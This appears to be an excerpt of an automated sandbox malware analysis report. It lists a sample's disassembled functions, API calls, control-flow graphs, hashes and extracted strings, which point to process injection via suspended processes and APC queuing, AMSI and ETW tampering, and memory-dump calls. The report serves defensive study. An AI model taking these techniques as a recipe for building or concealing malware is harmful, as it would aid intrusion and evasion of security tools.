                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$QueueThread
                                                              • String ID: NtQueueApcThread$ntdll
                                                              • API String ID: 3075473611-1374908105
                                                              • Opcode ID: 11608b2f3f3c01c14baba5e9628f2436f896bc41cbd977e40bb0d29d9edff113
                                                              • Instruction ID: 563bc1a1382e8e7fcd1b722ab6700863a55326fc4a5bc91789840ccf55dc5664
                                                              • Opcode Fuzzy Hash: 11608b2f3f3c01c14baba5e9628f2436f896bc41cbd977e40bb0d29d9edff113
                                                              • Instruction Fuzzy Hash: 92E026B2640209BF9F40DE9CD845E8F37EDAB0D7907004555FA09E7611D671ED248B75
                                                              Function 02B9D9F0 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                                                              • NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFileInitStringUnicode
                                                              • String ID:
                                                              • API String ID: 3559453722-0
                                                              • Opcode ID: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
                                                              • Instruction ID: 859238d7f6a49cac07242152b1ddf267ee39bfe1f41face0a37b1a6aec37dece
                                                              • Opcode Fuzzy Hash: 9f9d0a2dd6907f8f4fa19183ccd533d484cbe1667d02b26049347376f8ffe51a
                                                              • Instruction Fuzzy Hash: 8B014B75A0824AAEEF05FAA1CD81BCD77B9AB45704F5044E2E324F7091DA74AB148B25
                                                              Function 02B9DA44 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                                                              • RtlInitUnicodeString.NTDLL(?,?), ref: 02B9DA6C
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DABE), ref: 02B9DA82
                                                              • NtDeleteFile.NTDLL(?), ref: 02B9DAA1
                                                                • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: String$AllocDeleteFileFreeInitUnicode
                                                              • String ID:
                                                              • API String ID: 2841551397-0
                                                              • Opcode ID: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
                                                              • Instruction ID: f38f1d291bb24399c9ca2f4a515438841b77be2ca70569558a0df89cd848262f
                                                              • Opcode Fuzzy Hash: 8d7d4e99c2a9d409aabd3a9bab9d43f47259409cc5e42c6df8f2b3839e6b5afa
                                                              • Instruction Fuzzy Hash: CA01E871A0420DAAEB11FAE1CD52FDEB7BDEB49700F5045B1E614E2190EB74AB148A64
                                                              Function 02B96D50 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B96CF4: CLSIDFromProgID.OLE32(00000000,?,00000000,02B96D41,?,?,?,00000000), ref: 02B96D21
                                                              • CoCreateInstance.OLE32(?,00000000,00000005,02B96E34,00000000,00000000,02B96DB3,?,00000000,02B96E23), ref: 02B96D9F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFromInstanceProg
                                                              • String ID:
                                                              • API String ID: 2151042543-0
                                                              • Opcode ID: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
                                                              • Instruction ID: b39a8014757d4a89ff599e240ba940b06504358eab89bdd22ad5856ccb602f0e
                                                              • Opcode Fuzzy Hash: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
                                                              • Instruction Fuzzy Hash: E201F271608B04AFEB05EF65DC5296BBBBDEB49B10B5244B6F905D2650E6308E10C960
                                                              Function 02BA7878 Relevance: 162.0, APIs: 5, Strings: 86, Instructions: 2771processthreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 5548 2ba7878-2ba7a62 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 5603 2ba7a68-2ba7c67 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 5548->5603 5604 2ba7a63 call 2b98824 5548->5604 5663 2ba7c6d-2ba7e40 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84798 call 2b8494c call 2b84d20 call 2b84d9c CreateProcessAsUserW 5603->5663 5664 2ba8af1-2ba8c74 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84898 5603->5664 5604->5603 5771 2ba7ebe-2ba7fc9 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 5663->5771 5772 2ba7e42-2ba7eb9 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 5663->5772 5753 2ba8c7a-2ba8c89 call 2b84898 5664->5753 5754 2ba9420-2baaa25 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 * 16 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b846a4 * 2 call 2b98824 call 2b97b98 call 2b9818c call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 ExitProcess 5664->5754 5753->5754 5763 2ba8c8f-2ba8f62 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9e540 call 2b8480c call 2b8494c call 2b846a4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b87e18 5753->5763 6021 2ba921a-2ba941b call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b849a4 call 2b98bb0 5763->6021 6022 2ba8f68-2ba9215 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b84d8c * 2 call 2b84734 call 2b9dacc 5763->6022 5874 2ba7fcb-2ba7fce 5771->5874 5875 2ba7fd0-2ba82f0 call 2b849a4 call 2b9dc90 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b9cfa4 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 5771->5875 5772->5771 5874->5875 6191 2ba8309-2ba8aec call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 ResumeThread call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 CloseHandle call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b97ed4 call 2b987a0 * 6 CloseHandle call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 call 2b8480c call 2b8494c call 2b846a4 call 2b84798 call 2b8494c call 2b846a4 call 2b98824 5875->6191 6192 2ba82f2-2ba8304 call 2b98584 5875->6192 6021->5754 6022->6021 6191->5664 6192->6191
                                                              APIs
                                                                • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02CD57DC,02CD5820,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C), ref: 02BA7E39
                                                              • ResumeThread.KERNEL32(000008E8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8), ref: 02BA8483
                                                                • Part of subcall function 02B98584: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02B985B5
                                                              • CloseHandle.KERNEL32(000008EC,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,000008E8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C), ref: 02BA8602
                                                                • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                                • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                                • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                              • CloseHandle.KERNEL32(000008EC,000008EC,ScanBuffer,02BE137C,02BAAFD8,UacInitialize,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C), ref: 02BA89F4
                                                                • Part of subcall function 02B87E18: GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                                                                • Part of subcall function 02B9DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                                                                • Part of subcall function 02B9DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                                                                • Part of subcall function 02B9DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                                                                • Part of subcall function 02B9DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                                                                • Part of subcall function 02B9818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B98216), ref: 02B981F8
                                                              • ExitProcess.KERNEL32(00000000,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,Initialize,02BE137C,02BAAFD8,00000000,00000000,00000000,ScanString,02BE137C,02BAAFD8), ref: 02BAAA25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$CloseFile$CreateFreeHandleLoadProcessThread$AddressAttributesCacheExitFlushInstructionProcQueueResumeUserWrite
                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                              • API String ID: 849842579-3388343709
                                                              • Opcode ID: 4632b42a45f0cb6f2eeb4bb6bac411d5779f48b34377b58ccc89fd491064de14
                                                              • Instruction ID: 40e61c8e3f13d544ee01e5146313e4c51a7ecdfbb0004269834b945e13ab9d3a
                                                              • Opcode Fuzzy Hash: 4632b42a45f0cb6f2eeb4bb6bac411d5779f48b34377b58ccc89fd491064de14
                                                              • Instruction Fuzzy Hash: A7431875A1415A8FDB25FB64CD909DEB3B6EF89344F1044E6E00DEB214DA31AE86CF60
                                                              Function 02B81724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 8898 2b81724-2b81736 8899 2b81968-2b8196d 8898->8899 8900 2b8173c-2b8174c 8898->8900 8903 2b81a80-2b81a83 8899->8903 8904 2b81973-2b81984 8899->8904 8901 2b8174e-2b8175b 8900->8901 8902 2b817a4-2b817ad 8900->8902 8905 2b8175d-2b8176a 8901->8905 8906 2b81774-2b81780 8901->8906 8902->8901 8909 2b817af-2b817bb 8902->8909 8910 2b81a89-2b81a8b 8903->8910 8911 2b81684-2b816ad VirtualAlloc 8903->8911 8907 2b81938-2b81945 8904->8907 8908 2b81986-2b819a2 8904->8908 8912 2b8176c-2b81770 8905->8912 8913 2b81794-2b817a1 8905->8913 8915 2b817f0-2b817f9 8906->8915 8916 2b81782-2b81790 8906->8916 8907->8908 8914 2b81947-2b8195b Sleep 8907->8914 8917 2b819b0-2b819bf 8908->8917 8918 2b819a4-2b819ac 8908->8918 8909->8901 8919 2b817bd-2b817c9 8909->8919 8920 2b816df-2b816e5 8911->8920 8921 2b816af-2b816dc call 2b81644 8911->8921 8914->8908 8922 2b8195d-2b81964 Sleep 8914->8922 8928 2b817fb-2b81808 8915->8928 8929 2b8182c-2b81836 8915->8929 8924 2b819d8-2b819e0 8917->8924 8925 2b819c1-2b819d5 8917->8925 8923 2b81a0c-2b81a22 8918->8923 8919->8901 8926 2b817cb-2b817de Sleep 8919->8926 8921->8920 8922->8907 8930 2b81a3b-2b81a47 8923->8930 8931 2b81a24-2b81a32 8923->8931 8935 2b819fc-2b819fe call 2b815cc 8924->8935 8936 2b819e2-2b819fa 8924->8936 8925->8923 8926->8901 8934 2b817e4-2b817eb Sleep 8926->8934 8928->8929 8938 2b8180a-2b8181e Sleep 8928->8938 8932 2b818a8-2b818b4 8929->8932 8933 2b81838-2b81863 8929->8933 8942 2b81a68 8930->8942 8943 2b81a49-2b81a5c 8930->8943 8931->8930 8939 2b81a34 8931->8939 8944 2b818dc-2b818eb call 2b815cc 8932->8944 8945 2b818b6-2b818c8 8932->8945 8940 2b8187c-2b8188a 8933->8940 8941 2b81865-2b81873 8933->8941 8934->8902 8946 2b81a03-2b81a0b 8935->8946 8936->8946 8938->8929 8948 2b81820-2b81827 Sleep 8938->8948 8939->8930 8950 2b818f8 8940->8950 8951 2b8188c-2b818a6 call 2b81500 8940->8951 8941->8940 8949 2b81875 8941->8949 8952 2b81a6d-2b81a7f 8942->8952 8943->8952 8953 2b81a5e-2b81a63 call 2b81500 8943->8953 8957 2b818fd-2b81936 8944->8957 8963 2b818ed-2b818f7 8944->8963 8954 2b818ca 8945->8954 8955 2b818cc-2b818da 8945->8955 8948->8928 8949->8940 8950->8957 8951->8957 8953->8952 8954->8955 8955->8957
                                                              APIs
                                                              • Sleep.KERNEL32(00000000,?,02B82000), ref: 02B817D0
                                                              • Sleep.KERNEL32(0000000A,00000000,?,02B82000), ref: 02B817E6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
